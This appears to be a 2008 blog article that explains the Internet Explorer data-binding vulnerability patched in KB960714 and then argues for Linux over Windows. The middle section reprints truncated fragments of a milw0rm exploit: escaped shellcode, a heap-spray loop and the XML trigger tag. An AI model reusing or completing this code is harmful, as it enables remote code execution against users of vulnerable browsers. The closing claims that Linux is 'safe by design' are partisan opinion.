It could be critical for previous versions of Internet Explorer too but Microsoft didn't test them because they're no longer supported.
Being a curious type when I saw all the hubbub about a new major critical vulnerability in Internet Explorer I wanted to know just what it was about.
First, the best way to get the fix for your Windows operating system, irrespective of flavour, is Windows Update. Yet, the text accompanying the update is typically brief:
Security Update for Internet Explorer 7 in Windows Vista (KB960714)
Published 18th December 2008
Update type: Important
Security issues have been identified that could allow an attacker to compromise a system running Microsoft Internet Explorer and gain control over it. You can help protect your system by installing this update from Microsoft.
While that doesn’t tell us much, the knowledge base article (or “KB”) 960714 referenced does spill the beans.
Fundamentally, it was discovered that program code – of a malicious person’s construction – be executed on your computer, if a user views a specially crafted web page with IE.
In particular, a rogue script can allocate a block of memory (an array) then apparently release it without updating the array’s length, meaning that the block of memory still remains preserved.
Then, if data binding is enabled (which it is, by default), a rogue web page can take advantage of an incorrect handling of certain XML tags within IE to cause the browser to pass control to the supposedly free memory location.
If the script had pre-filled that memory with actual executable instructions then the author has effectively been able to cause your computer to do something of their bidding, under your user credentials.
You can find a harmless code example over the page which will make calc.exe (ie Windows Calculator) display itself. The code is merely presented in a readable format; it will not actually run.
This code snippet was published on exploit web site milw0rm.com and illustrates how the exploit works.
Now the program script itself; the shellcode object contains the machine code instructions to execute a process, running calc.exe.
Note, I have broken this line up for readability but you ought to ensure it is all one continuous line when pasting it into a text editor:
var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536
The next piece of script code sprays the heap to push the memory address of the array onto it, in an effort to make it callable:
var spray = unescape("%u0a0a%u0a0a");
spray += spray;
} while(spray.length < 0xd0000);
memory = new Array();
for(i = 0; i < 100; i++)
memory[i] = spray + shellcode;
And here is the exploit; the following XML tag is incorrectly handled in unpatched versions of Internet Explorer and will cause it to pass control to the memory address of the array, and therefore execute the program instructions it contains.
This too should be one continuous line in a text editor:
xmlcode = "<XML ID=I><X><C><![CDATA[<image
</X></XML><SPAN DATASRC=#I DATAFLD=C
DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
tag = document.getElementById("replace");
tag.innerHTML = xmlcode;
Of course, while this example does nothing harmful, it has been noted that the vulnerability has been used to install Trojan horse programs elsewhere.
Microsoft offer instructions how to mitigate the effectiveness of this vulnerability and in so doing indirectly espouse the Linux viewpoint on secure computing. Let me explain.
I won’t repeat the comments made by others that using a different web browser, such as Mozilla Firefox, will protect you from problems like this, but I will comment on something else.
That makes sense; if a user runs with administrator privileges the rogue code can have full control of their system. If the user is unprivileged then the attack surface is much less.
Nevertheless, it’s a pipe dream. Unlike operating systems like Linux which have always encouraged users to have “ordinary” accounts and only claim administrator privileges when needed, and only for performing specific tasks, Windows has trained its users – and worse, its legion of developers – to always run as the local administrator.
Vista’s UAC was intended to help mitigate this problem but proved unpopular due to the great number of programs which necessitate elevated privileges.
Perhaps the ultimate solution for a safe online experience isn’t to just change your browser but to change your OS also.
Give thought to Linux; it is safe by design. This design has lasted the test of time. This design is now a major differentiation between it and Windows.
Microsoft are hoping to undo their bad security design by re-educating its horde of users to a Linux way of life. This re-education isn't working, largely because any attempts to run within a totally unprivileged environment mean the bulk of your programs no longer work.
Microsoft have to bite the bullet and obliterate the design goal of backward compatibility if they ever hope to genuinely have an operating system where administrator-level accounts aren't used for ordinary logins and usage. It's not going to be pretty.
Meanwhile, Linux just keep soldiering on. It got it right from the start. Its users are accustomed to running sudo if they temporarily require higher access as the following xkcd comic illustrates.